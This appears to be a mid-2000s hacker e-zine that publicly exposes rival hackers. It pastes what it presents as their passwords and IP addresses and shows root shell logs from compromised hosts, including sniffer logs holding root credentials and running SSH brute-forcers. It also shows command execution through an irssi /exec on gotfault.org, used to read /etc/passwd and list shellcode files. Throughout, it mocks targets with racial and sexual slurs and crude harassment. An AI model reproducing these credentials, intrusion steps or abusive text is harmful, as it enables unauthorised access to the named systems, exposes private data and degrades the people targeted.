exploits/THCREALbad.c*
exploits/halflife2*
exploits/m00-deadbear3.tar.gz*
exploits/priv8sambar.pl*
exploits/shoutdead.c*
codes/shaftmaster.c
exploits/TTsharefile*
exploits/imap4life.pl*
exploits/m00-samba-pwnd.tar.bz2*
exploits/proftd_put_down2~m00.c*
exploits/shv5.tar.gz*

examples/fmt:
server-remote.c

examples/heap:
heap.c

examples/stack:
client-remote.c
local.c
local2.c
server-remote.c
~-~-~-~-~-~-~-~-~-~-~-~-~-~

[3] GET HIS PASSWORDZ.

24.177.23.252 skew:5ubiZ3r0
skewtty.dyndns.org
212.202.49.153 skew:*jd4^52h*d2=

~-~ skew rooted boxes ~-~
plet.compumail.co.za
knysna.compumail.co.za
umhlanga.compumail.co.za
lin02.compumail.co.za
histologic.no-ip.info
irenefw.irenecountrylodge.co.za 196.25.22.178

[4] GET HIS SHELLZ:
~-~-~-~-~-~-~-~-~-~-~-~-~-~
skew @ plet: Here we learn Skew has mad eleet codes and sshbrute'z like a bitch.
~-~-~-~-~-~-~-~-~-~-~-~-~-~
login as: root
root@plet's password:
[root@plet root]# cd /tmp/
[root@plet tmp]# ls -al
total 14
drwxrwxrwt 5 root root 360 Jun 14 01:28 ./
drwxr-xr-x 21 root adm 880 May 30 08:20 ../
d--S--S--T 18 root root 1416 Jun 14 01:00 .../
-rw-rw-rw- 1 ratana_g ratana_g 4 Jun 13 15:00 .900.f5a648
drwxrwxrwt 2 xfs xfs 72 Sep 12 2003 .font-unix/
srw------- 1 root root 0 May 22 10:14 .fsav-0=
srw------- 1 root root 0 Jun 14 01:28 .fsav-0-sa=
-rw-r--r-- 1 root root 0 Jun 13 04:10 authfail.log.unsort
-rw-r--r-- 1 root root 0 Jun 13 04:10 denied.log.unsort
-rw-r--r-- 1 root root 554 Jun 14 00:58 ls
-rw-r--r-- 1 root root 0 Jun 13 04:10 sarg.log.unsort
drwx------ 2 root root 80 Feb 27 2003 ssh-XXE002K6/
[root@plet tmp]# cd ...
[root@plet ...]# ls -al
total 159052
d--S--S--T 18 root root 1416 Jun 14 01:00 ./
drwxrwxrwt 5 root root 360 Jun 14 01:30 ../
-rw-r--r-- 1 root root 21788442 Jun 14 01:30 .sniff
-rw-r--r-- 1 root root 121983894 Jan 1 18:25 .sniff.old
-rw-r--r-- 1 root root 6178477 May 20 08:28 .sniff.old2
drwxr-xr-x 12 dlv_bern 1038 1200 Apr 23 20:36 BitchX/
drwxr-sr-x 2 root root 120 Jun 8 04:33 afp/
drwxrwxrwx 8 3232 ntools 928 Jan 14 06:35 cfengine-2.0.7/
-rw-r--r-- 1 root root 1190033 May 15 2003 cfengine-2.0.7.tar.gz
drwxr-sr-x 2 root root 96 Jun 8 18:12 cimap/
drwxr-xr-x 10 1001 wheel 864 Jun 11 15:54 h4ckwebdav/
-rw-r--r-- 1 root root 405818 Jun 11 15:51 h4ckwebdav.tar.gz
-rwx------ 1 root root 12014 Sep 14 2004 hide*
drwxr-sr-x 2 root root 152 Jun 6 17:31 imap/
-rw-r--r-- 1 root root 6550 Apr 23 20:32 index.html
-rw-r--r-- 1 root root 2532476 Mar 27 2004 ircii-pana-1.1-final.tar.gz
-rw-r--r-- 1 root root 1153560 Dec 11 2003 irssi-0.8.9.tar.gz
drwxr-sr-x 5 root root 144 May 12 23:33 john-1.6/
-rw-r--r-- 1 root root 497341 Sep 18 1999 john-1.6.tar.gz
-rw-r--r-- 1 root root 0 Jun 13 05:41 mail.hm
drwxrwxrwx 32 1000 1000 1416 May 28 08:05 mailutils-0.6/
-rw-r--r-- 1 root root 2837017 Dec 23 20:19 mailutils-0.6.tar.gz
drwxrwxrwx 4 500 frog_rud 1824 Jun 8 15:42 nano-1.2.5/
-rw-r--r-- 1 root root 911938 May 16 06:06 nano-1.2.5.tar.gz
-rw-r--r-- 1 root root 1846196 Apr 24 08:58 nmap-3.81.tgz
-rw-r--r-- 1 root root 2105 Dec 11 2004 nmap.log
drwxrwxr-x 7 500 frog_rud 10768 Jun 8 15:56 openssh-3.4p1/
-rw-r--r-- 1 root root 837668 Sep 17 2002 openssh-3.4p1.tar.gz
-rw-r--r-- 1 root root 312224 Jun 24 2004 psyBNC2.3.1.tar.gz
drwxrwxr-x 11 root root 728 Mar 9 08:58 psybnc/
drwxr-sr-x 2 root root 176 May 27 21:41 rlogin/
-rw------- 1 1010 dlv_bern 263 Feb 18 2000 rootkitutil.h
drwxr-xr-x 3 root wheel 216 Jan 2 07:58 shoutcast-1-9-4-linux-glibc6/
-rw-r--r-- 1 root root 152616 Mar 18 2004 shoutcast-1-9-4-linux-glibc6.tar.gz
drwxr-xr-x 2 root root 632 May 11 23:10 shroud-1.30/
-rw-r--r-- 1 root root 9248 Nov 3 2002 shroud-1.30.tgz
-rwxr-xr-x 1 root root 20416 May 13 00:43 sol*
-rw-r--r-- 1 root root 12529 May 13 00:42 sol.c
drwxr-sr-x 2 root root 256 Jun 12 03:37 sshbrute/
-rw-r--r-- 1 root root 2402 Jun 10 06:21 ssheist-1.log
drwxr-sr-x 3 root root 656 May 12 04:03 synscan/
-rw-r--r-- 1 root root 53939 Mar 22 2002 synscan1.6.tar.gz
-rwxr-xr-x 1 root root 19860 May 11 23:13 vanish2*
-rw------- 1 1010 dlv_bern 8525 Feb 18 2000 vanish2.c
-rw-r--r-- 1 root root 3256 Feb 18 2000 vanish2.tgz
[root@plet ...]# head -n 2 nmap.log
Host 196.15.249.65 appears to be up.
Host 196.15.249.66 appears to be up.
[root@plet ...]# cat ssheist-1.log

===========================================================================
Username: root Password: n3tw0rk1ng Host: lin02.*******.**.**
===========================================================================

===========================================================================
Username: root Password: `1q2wsxde Host: lin02.*******.**.**
===========================================================================

===========================================================================
Username: root Password: n3tw0rk1ng Host: localhost
===========================================================================

===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.*********.**.**
===========================================================================

===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.*********.**.**
===========================================================================

===========================================================================
Username: root Password: n3tw0rk1ng Host: sodwana.*********.**.**
===========================================================================

===========================================================================
Username: root Password: coahtr Host: histologic.*****.****
===========================================================================

===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.*********.**.**
===========================================================================

===========================================================================
Username: test Password: test Host: 129.*.***.**
===========================================================================

===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.*********.**.**
===========================================================================

===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.*********.**.**
===========================================================================
[root@plet ...]# cd john-1.6/
[root@plet john-1.6]# cd run
[root@plet run]# ls
128.8.140.206.shadow john.ini restore
all.chr john.pot unafs@
alpha.chr lanman.chr unique@
digits.chr mailer* unshadow@
john* password.lst
[root@plet run]# ps aux |grep sshbrute
root 14207 0.0 0.0 2632 764 ? S Jun03 0:12 ./sshbrute -brute
root 27645 0.0 0.0 2632 760 ? S Jun10 0:04 ./sshbrute2 -brut
root 27695 0.0 0.0 2632 760 ? S Jun10 0:01 ./sshbrute2 -brut
root 27805 0.0 0.0 2632 764 ? S Jun10 0:00 ./sshbrute -brute
root 26355 0.0 0.0 2632 764 ? S Jun11 0:00 ./sshbrute -brute
root 32265 0.0 0.0 2632 764 ? S Jun12 0:00 ./sshbrute -brute
root 32275 0.0 0.0 2632 760 ? S Jun12 0:00 ./sshbrute2 -brut
root 18328 0.5 0.1 2800 1268 ? S 01:29 0:01 ./sshbrute -brute
root 18369 0.3 0.1 2796 1296 ? S 01:30 0:00 ./sshbrute -brute
root 18397 0.5 0.1 2796 1296 ? S 01:31 0:00 ./sshbrute -brute
root 18433 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut
root 18436 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute -brute
root 18459 0.2 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut
root 18470 0.2 0.1 2784 1120 ? S 01:33 0:00 ./sshbrute2 -brut
root 18471 0.0 0.1 3172 1320 pts/4 R 01:33 0:00 ps aux
[root@plet run]# logout


----------------------------------
skew @ histologic: nothing much here but more pr00f skew == tal0n.
----------------------------------
login as: root
root@histologic's password:
Last login: Tue Jun 14 04:51:51 2005 from adsl-10-197-59.mia.bellsouth.net
[root@histofw root]# history | grep talon
963 adduser talon
964 passwd talon
965 su talon
966 userdel talon
967 userdel -r talon
968 rm -rf /home/talon
[root@histofw root]# ls -al /tmp/.../
total 16
drwx------ 2 root root 4096 Jun 12 06:03 ./
drwxrwxrwt 6 root root 4096 Jun 14 05:14 ../
-rw-r--r-- 1 root root 5595 Jun 12 14:30 nmap.log

------------------------------------
skew @ knysna: absolutely nothing here just some lame hacking attempts it seems.
------------------------------------
login as: root
root@knysna's password:
Last login: Tue Jun 14 01:42:21 2005 from dsl-5-37.sg-b.tiscali.no
[root@knysna root]# history | tail -n11
987 w
988 cat /var/tmp/.ssheiost.log
989 cat /var/tmp/.ssheist.log
990 host 196.**.***.***
991 host 196.**.**.***
992 ssh root@196.**.**.***
993 cat /var/tmp/.ssheist.log
994 host 196.**.**.***
995 cat > /var/tmp/.ssheist.log
996 cat /var/tmp/.ssheist.log
997 exit
[root@knysna root]# ls -al '/tmp/.../'
total 8
drwx------ 2 root root 4096 Jun 8 16:32 ./
drwxrwxrwt 5 root root 4096 Jun 14 04:03 ../
[root@knysna root]# ls -al /car/tmp/v
total 8
drwxrwxrwt 2 root root 4096 Jun 14 04:03 ./
drwxr-xr-x 20 root root 4096 Aug 31 2004 ../
-rw-r--r-- 1 root root 0 Jun 13 15:32 .ssheist.log
[root@knysna root]# logout

~-~-~-~-~-~-~-~-~-~-~-~-~-~
> From these shells we notice a few things:
1. that tal0n sets up sshbrute (his ssh brute forcer)
1: that tal0n sets up ssheist (his ssh sniffer)
2: he usually makes a dir /.../ in /tmp/ so if you have /tmp/.../ you have been
owned by skew. but thats fucking impossible unless youre a complete dumbshit
3: skew cant hack.
~-~-~-~-~-~-~-~-~-~-~-~-~-~

[5] LAUGH FOR DAYZ AT THIS DORK
~-~-~-~-~-~-~-~-~-~-~-~-~-~
I hope skew has learned from all of this not to talk shit about people dont
fuck over your friends (now you know how it feels) stop coding complete shit,
stop the lies, admit youre tal0n, and dont think you are better than us. you
are not.

-~-~-~
NEWZ: sources report after his latest own skew has changed nicks again!
IMAGINE THAT! sources say his new handle is tivofreakr2d2.. rm on sight.
-~-~-~

-~-~-~
MORENEWZ: being tiped off tal0n has changed his nick again. rm bandit at will.
-~-~-~


06.txt -~-~-~ k33p1ng 0d4y s4f3 (th3 v3rs10n phC n3v3r w4nt3d y0u t0 s33!!)

l3tz jump r1ght 1nt0 th3 th30ry 0f w4r3z st34l1ng. 4s th3 gr34t
sun s3cur1ty 3xp3rt l4nc3 sp1tzc0q 0nc3 s41d "t0 kn0w 4 h4qu3r
y0u n33d t0 sl33p w1th 4 haqu3r", much th3 s4m3 c4n b3 s41d
4b0ut 0d4yyzz. y0u n33d t0 f1nd wh3r3 th3y l1v3. y0u n33d t0
curl up w1th th3m l4t3 4t n1ght wh3n m0mmy 1z sl33p1ng. Th3y
4r3 usu4lly 1n grep 'h4qu3r' /etc/passwd's $H0M3. 0r 4s w3
c4n s33 1n twd`z ~/

Aug 01 05:15:46 <twd> HELL YEAH!
Aug 01 05:15:46 <Fac51> | ___| | / _ \ / _ \| _ \
Aug 01 05:15:46 <Fac51> | |_ | | | | | | | | | | | |
Aug 01 05:15:46 <Fac51> | _| | |__| |_| | |_| | |_| |
Aug 01 05:15:46 <Fac51> |_| |_____\___/ \___/|____/
Aug 01 05:15:48 <Fac51>
Aug 01 05:15:53 <twd> be el8
Aug 01 05:15:59 <Fac51> RESPEK NIGGA... WOOPTY-WOO
Aug 01 05:16:02 <twd> I AM FLOODING YOU LAWL
Aug 01 05:16:04 <twd> I AM FLOODING YOU LAWL
Aug 01 05:16:07 <twd> I AM FLOODING YOU LAWL
Aug 01 05:16:14 <twd> wanna see some 0day w4r3z?
Aug 01 05:16:50 <Fac51> vista?
Aug 01 05:16:51 <Fac51> lol
Aug 01 05:16:59 <twd> /usr/home/twd
Aug 01 05:17:08 <twd> thatz where all my 0day ju4r3z iz ^^
Aug 01 05:17:30 <twd> bettar yet
Aug 01 05:17:35 <twd> total 55144
Aug 01 05:17:36 <twd> drwxr-xr-x 12 twd leet 1024 Jul 31 19:01 .
Aug 01 05:17:36 <twd> drwxr-xr-x 4 root whe 512 Jun 29 15:00 ..
Aug 01 05:17:36 <twd> drwx------ 3 twd leet 512 Jun 29 03:05 .BitchX
Aug 01 05:17:36 <twd> -rw-r--r-- 1 twd leet 771 Jun 29 01:52 .cshrc
Aug 01 05:17:36 <-- twd has quit (Excess Flood)

t00 m4ny 0d4yz!!! n0w th1z c0ckg0bbl3r s4yz h3 c0d3z 0d4yz 3v3ryd4y,
but h3'z t00 f4t t0 us3 th3 c0mput4r th4t much. h1z m0m h3lpz h1m
g3t 0ut 0f b3d 0n th3 w33k3ndz s0 h3 c4n c0d3 3 l1n3z 0f ass3mbly.
b3c4us3 0f th1z 1nc3ns3 r3l4t10nsh1p A n3tw0rk 0f truzt w4z f0rm3d.
3v3n th0ugh w3 4r3 g0nn4 3xpl01t 1t w3 r3sp3ct th3 m0m r4p3, s0 w3'll
l34v3 th31r 3v3r-l4st1ng l0v3 4l0n3.

l3tz s33 wh4t h4pp3ndz wh3n w3 msg el1t3_twd`z_m0m 0n msn...

el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : hello sexy young boy.
h0fuckno@yourbox.di0adsux.com : huuuuu!!!
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : tell me what you want.
h0fuckno@yourbox.di0adsux.com : 3y3 w4nt 0d4yz
h0fuckno@yourbox.di0adsux.com : g1v3 m3 twd`z r00t p4zz
h0fuckno@yourbox.di0adsux.com : pl34s3 wh0r3.
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : ok. let me first get comfortable.
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : /me takes off her granny panties
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : /me lights a candle
h0fuckno@yourbox.di0adsux.com : b1tch pl34z3. 3y3'm buzy.
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : ok ok.
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : I guess I'll dance for twd tonight
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : ssh twd.likes-mum.com -ltwd -p1337
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : pass: BiSons4Mumz
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
m0mmy_d34r3zt@twdz-mumz.org : you bastard! atleast finger fuck me!
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -

0kz, s0 sh3'z nutz 4z fuq, but y0u s33 th1z 1z br0k3n truzt. f0r
m0re 1nf0rm4t10n r34d th0mps0n'z p4p3r 0n truzt1ng truzt, 0r h1z
l3zz3r kn0wn p4p3r 0n truzt1ng tr0j4n c0nd0mz. h3h3h3.

-~-~-~ !!!th1z juzt 1n!!! ~-~-~-~
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : I thought you could only get pregnate
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : if the son's cock was more than 2 1/2
inches long.
h0fuckno@yourbox.di0adsux.com : http://acm.org/paperz/truzting_condomz.txt y0u
dumb cunt!

sh3'z pr3gn4t3!! 3y3 d3t3ct 4n0th3r r3t4rd w1ll s00n 3nt3r th3
bl00dl1n3. sh3 b3tt3r l4y 0ff th3 fuqn h3r01n.
-~-~-~ b4q t0 th3 w4r3z hunt ~-~-~-~

4nyw4yz. twd` m0m 1z 4 d1rty wh0r3 4nd twd`z g0t s0m3 0d4yz t0
st34l. 0n w1th th3 sh0w...


[(root@r0q1ngw1thch4rt3r) (/) ] # ls -al /usr/home/twd
total 55144
drwxr-xr-x 12 twd leet 1024 Jul 31 19:01 .
drwxr-xr-x 4 root wheel 512 Jun 29 15:00 ..
drwx------ 3 twd leet 512 Jan 02 1998
drwx------ 3 twd leet 512 Jun 29 03:05 .BitchX
-rw-r--r-- 1 twd leet 771 Jun 29 01:52 .cshrc
drwxr-x--- 3 twd fedz 512 Jul 31 19:01 .n4rql0gz
lrwxrwxrwx 1 twd leet 9 Jan 02 1998 .3y3d0nth4v34nyth1ng -> /dev/null
lrwxrwxrwx 1 twd leet 9 Jun 02 1998 .pl34zel34v3m34l0n3 -> /bin/exit
[(root@r0q1ngw1thch4rt3r) (/) ] #

wtf, wh3r3z th3 0d4yz? .n4rql0gz 1s juzt 4 l0g 0f #netwhores@efnet (<- d0rk13st
pl4c3 0n 34rth) 4nd s0m3 l0gz 0f d1v1n31nt try1ng t0 h4q 4 w1nd0wz b0x.

1t turnz 0ut, 4ft3r cl0s3 1nsp3ct10n th4t th3r3 1z 4 s3cr3t d1r us1ng 0ld h4ck3r
tr1ck!!!

[(root@r0q1ngw1thch4rt3r) (/) ] # cd "/usr/home/twd/ "
[(root@r0q1ngw1thch4rt3r) (/usr/home/twd/ ) ] # ls -al
total 55144
drwx------ 12 twd leet 1024 Jun 02 1998 .
drwxr-xr-x 4 twd leet 512 Jul 31 19:01 ..
drwx------ 3 twd leet 512 Jan 02 1998 mumpiqz
-rw------- 1 twd leet 771 Nov 24 1997 mircd0s.sh
-rw------- 1 twd leet 771 Dec 08 1997 abo1.c
-rw------- 1 twd leet 771 Jan 01 1998 sshbrute3.c
[(root@r0q1ngw1thch4rt3r) (/usr/home/twd/ ) ] #

buh4h4h4h4. h3 h4z n0 0d4yz, but w3 scp'd th3s3 4nyw4yz.

twd`, y0u suq.
twd`_mum, y0u suq twd`.
burn3y3, y0u suq.
byt3r4g3, y0ur rul3!

wr1tt1ng 0d4yz 0n p4p3r 1z th3 0nly w4y h0no d03z 1t.
(d0nt pr1nt 1t.. fx 1z sn1ff1ng y0ur pr1nt3r!!)


07.txt -~-~-~ g0tfuq3d, g0t0wn3d, g0tn00d4yz4h0not0st34l...


/* GotFaulT ....
____ __ _____ __ __
/\ _`\ /\ \__/\ __`\ /'__`\ /\ \
\ \ \L\_\ ___\ \ ,_\ \ \/\ \ __ __ __ ___ /\_\L\ \ \_\ \
\ \ \L_L / __`\ \ \/\ \ \ \ \/\ \/\ \/\ \ /' _ `\/_/_\_<_ /'_` \
\ \ \/, \/\ \L\ \ \ \_\ \ \_\ \ \ \_/ \_/ \/\ \/\ \/\ \L\ \/\ \L\ \
\ \____/\ \____/\ \__\\ \_____\ \___x___/'\ \_\ \_\ \____/\ \___,_\
\/___/ \/___/ \/__/ \/_____/\/__//__/ \/_/\/_/\/___/ \/__,_ /

th1s h0m0'5 4r3 l4me.. 5eC c0mmuN1Ty'z 4re Pl4YeD 0u7 f00lz..
y0u 9uYz 5uR3 d0 GoTFauLT 7h0hGh.. Y0uZ GoTFaulTY C0d1nd h0h0h0h0
*/



login as: publisher
publisher@gotfault.org's password:
Last login: Wed Jun 12 12:10:36 2005 from h.0.n.o

Enable ANSi? [Y/n]> Y
B+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
| |
| ________ __ _____ .__ __ |
| / _____/ _____/ |__/ ____\____ __ __| |_/ | |
| / \ ___ / _ \ __\ __\\__ \ | | \ |\ __\ |
| \ \_\ ( <_> ) | | | / __ \| | / |_| | |
| \______ /\____/|__| | | (____ /____/|____/__| |
| \/ | | \/ |
| | | |
| <A>udits | | <C>chat|
| <T>oolbox | | <B>lackboard|
| <P>apers | | <O>ptions|
| <E>xploits | | <W>ho's Online |
| <S>nipplets |__| <L>ogout |
| |
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+

gotfault> C
14:28 -!- Irssi: Looking up localhost14:28 -!- Irssi: Connecting to localhost

h4h4h4 irssi 0wnz th3m.


[(status)]
[14:28] [publisher] [1:localhost (change with ^X)]
14:28 -!- Irssi: Connection to localhost established
[publisher] [1:localhost (change with ^X)]

[14:29]/exec uname -a;id
14:29 Linux gerrit 2.4.29-vs1.2.10 #3 SMP Mo Apr 11 17:42:48 CEST 2005 i686 GNU/Linux
14:29 uid=1006(publisher) gid=1006(publisher) groups=1006(publisher)
14:29 -!- Irssi: process 0 (uname -a;id) terminated with return
code 0

/exec ls -al
14:29 total 4014:29 drwx------ 8 publisher publisher 4096 May 23 04:46 .
14:29 drwxr-xr-x 16 root root 4096 Jun 4 15:56 ..
14:29 -rw------- 1 publisher root 6 May 23 14:39 .bash_history
14:29 drwx------ 2 publisher publisher 4096 May 22 19:42 .irssi
14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:33 ansi
14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:42 ascii
14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:36 bin
14:29 drwxr-xr-x 9 publisher publisher 4096 May 23 04:40 database
14:29 -rwxr-xr-x 1 publisher publisher 1124 May 22 19:52 publisher
14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:33 scripts
14:29 -!- Irssi: process 0 (ls -al) terminated with return
code 0

wh0z uP 1n hUr!?!?

/exec cat /etc/passwd
14:30 root:x:0:0:root:/root:/bin/bash
14:30 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
14:30 bin:x:2:2:bin:/bin:/bin/sh
14:30 sys:x:3:3:sys:/dev:/bin/sh
14:30 sync:x:4:65534:sync:/bin:/bin/sync
14:30 games:x:5:60:games:/usr/games:/bin/sh
14:30 man:x:6:12:man:/var/cache/man:/bin/sh
14:30 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
14:30 mail:x:8:8:mail:/var/mail:/bin/sh
14:30 news:x:9:9:news:/var/spool/news:/bin/sh
14:30 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
14:30 proxy:x:13:13:proxy:/bin:/bin/sh
14:30 postgres:x:31:32:postgres:/var/lib/postgres:/bin/false
14:30 www-data:x:33:33:www-data:/var/www:/bin/sh
14:30 backup:x:34:34:backup:/var/backups:/bin/sh
14:30 operator:x:37:37:Operator:/var:/bin/false
14:30 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
14:30 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
14:30 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
14:30 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
14:30 sshd:x:100:65534::/var/run/sshd:/bin/false
14:30 postfix:x:101:101::/var/spool/postfix:/bin/false
14:30 mysql:x:102:103:MySQL Server:/var/lib/mysql:/bin/false
14:30 vmail:x:2000:2000::/home/vmail:/bin/false
14:30 snort:x:103:104:Snort IDS:/var/log/snort:/bin/false
14:30 smmsp:x:104:105:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
14:30 setnf:x:1000:100::/home/setnf:/bin/bash
14:30 fourtrax:x:1002:1002:,,,:/home/fourtrax:/bin/bash
14:30 posidron:x:2002:100::/home/posidron:/bin/bash
14:30 rushjo:x:2003:100::/home/rushjo:/bin/bash
14:30 sirphreak:x:2004:100::/home/sirphreak:/bin/bash
14:30 awk:x:2005:100::/home/awk:/bin/bash
14:30 spot:x:2006:100::/home/spot:/bin/bash
14:30 khz:x:2007:100::/home/khz:/bin/bash
14:30 peacetreaty:x:1001:1001:,,,:/home/peacetreaty:/bin/bash
14:30 certificate:x:1003:1003:Certificate User,,,:/home/certificate:/home/certificate/bin/stncert/buildssh
14:30 nutshell:x:1004:1004:,,,:/home/nutshell:/bin/bash
14:30 phyro:x:1005:1005:,,,:/home/phyro:/bin/bash
14:30 publisher:x:1006:1006:Publisher System,,,:/home/publisher:/home/publisher/publisher
14:30 trapdown:x:1007:1007:,,,:/home/trapdown:/bin/bash
-!- Irssi: process 0 (cat /etc/passwd) terminated with return
code 0

/exec ls -al /home/
14:31 total 64
14:31 drwxr-xr-x 16 root root 4096 Jun 4 15:56 .
14:31 drwxr-xr-x 17 root root 4096 Jun 13 02:11 ..
14:31 drwx------ 4 awk users 4096 Jun 14 00:32 awk < GRRRAAWWWLLLL!!!! AWK!!! GRRRAAWWWL!LL!!!@#
14:31 drwx------ 6 certificate certificate 4096 Jun 15 07:48 certificate
14:31 drwx------ 2 fourtrax users 4096 Jan 3 20:43 fourtrax
14:31 drwx------ 3 khz users 4096 May 27 15:02 khz
14:31 drwx------ 5 nutshell users 4096 Jun 10 02:40 nutshell
14:31 drwx------ 2 peacetreaty users 4096 Apr 19
14:31 drwx------ 8 phyro users 4096 May 28 22:26 phyro
14:31 drwx------ 12 posidron users 4096 Jun 15 08:34 posidron < th1s m0f0 w1ll sh3llc0d3 y0u t0 d3f !!
14:31 drwx------ 8 publisher publisher 4096 May 23 04:46 publisher
14:31 drwx------ 5 rushjo users 4096 Apr 29 01:39 rushjo
14:31 drwxrwxr-x 9 521 521 4096 Jun 14 23:16 setnf
14:31 drwx------ 9 sirphreak users 4096 Jun 1 09:29 sirphreak
14:31 drwx------ 6 spot users 4096 May 16 02:39 spot
14:31 drwx------ 5 trapdown trapdown 4096 Jun 7 03:12 trapdown
14:31 -!- Irssi: process 0 (ls -al /home/) terminated with return
code 0

/exec locate * |grep home
14:32 /home/publisher/ansi
14:32 /home/publisher/ansi/audits.menu
14:32 /home/publisher/ansi/blackboard.menu
14:32 /home/publisher/ansi/bytecode.menu
14:32 /home/publisher/ansi/exploits.menu
14:32 /home/publisher/ansi/main.menu
14:32 /home/publisher/ansi/options.menu
14:32 /home/publisher/ansi/papers.menu
14:32 /home/publisher/ansi/snipplets.menu
14:32 /home/publisher/ansi/tools.menu
14:32 /home/publisher/ascii
14:32 /home/publisher/ascii/audits.menu
14:32 /home/publisher/ascii/bytecode.menu
14:32 /home/publisher/ascii/exploits.menu
14:32 /home/publisher/ascii/main.menu
14:32 /home/publisher/ascii/options.menu
14:32 /home/publisher/ascii/papers.menu
14:32 /home/publisher/ascii/snipplets.menu
14:32 /home/publisher/ascii/tools.menu
14:32 /home/certificate/bin
14:32 /home/certificate/bin/stncert
14:32 /home/certificate/bin/stncert.tgz
14:32 /home/certificate/bin/stncert/buildssh
14:32 /home/certificate/bin/stncert/build_ca.sh
14:32 /home/certificate/bin/stncert/build_ca_cert.sh
14:32 /home/certificate/bin/stncert/build_cert.sh
14:32 /home/certificate/bin/stncert/email.txt
14:32 /home/certificate/bin/stncert/ircs.conf
14:32 /home/certificate/bin/stncert/README
14:32 /home/certificate/bin/stncert/removepass.sh
14:32 /home/certificate/bin/stncert/stunnel.pid
14:32 /home/posidron/audit/daemons/jukepeg-1.9/mpglib/tabinit.c
14:32 /home/posidron/audit/ftpd/kadet/bin
14:32 /home/posidron/audit/ftpd/kadet/bin/kadet
14:32 /home/posidron/audit/ftpd/kadet/bin/kadet.in
14:32 /home/posidron/audit/ftpd/kadet/bin/mod
14:32 /home/posidron/audit/ftpd/kadet/bin/mod.in
14:32 /home/posidron/audit/ftpd/pftpd-1.0/.gdbinit
14:32 /home/posidron/audit/httpd/aolserver-4.0.10/nsd/binder.c
14:32 /home/posidron/audit/httpd/aolserver-4.0.10/nsdb/dbinit.c
14:32 /home/posidron/audit/httpd/boa-0.94.13/src/webindex.pl
14:32 /home/posidron/audit/httpd/monkey-0.9.1/bin
14:32 /home/posidron/audit/httpd/monkey-0.9.1/cgi-bin
14:32 /home/posidron/audit/httpd/monkey-0.9.1/cgi-bin/test.pl
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wncat
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnhtmlify
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnindexmaker
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnpnuts
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnredir
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnsectsearch
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnseven_m
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnv2c
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_mkdigest
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_mkpasswd
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_uncache
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/intl/bindtextdom.c
14:32 /home/posidron/audit/local/usr/local/bin
14:32 /home/posidron/audit/local/usr/local/bin/libmikmod-config
14:32 /home/posidron/dump/bytecode/shellcodes/aix/aix-execve_bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/all-OS/LNX-FBSD-bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/alpha/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/alpha/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/alpha/portbindsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bind.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bsdi-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bsdi-execve_binsh2.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-bin-sh.S
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-binsh.c
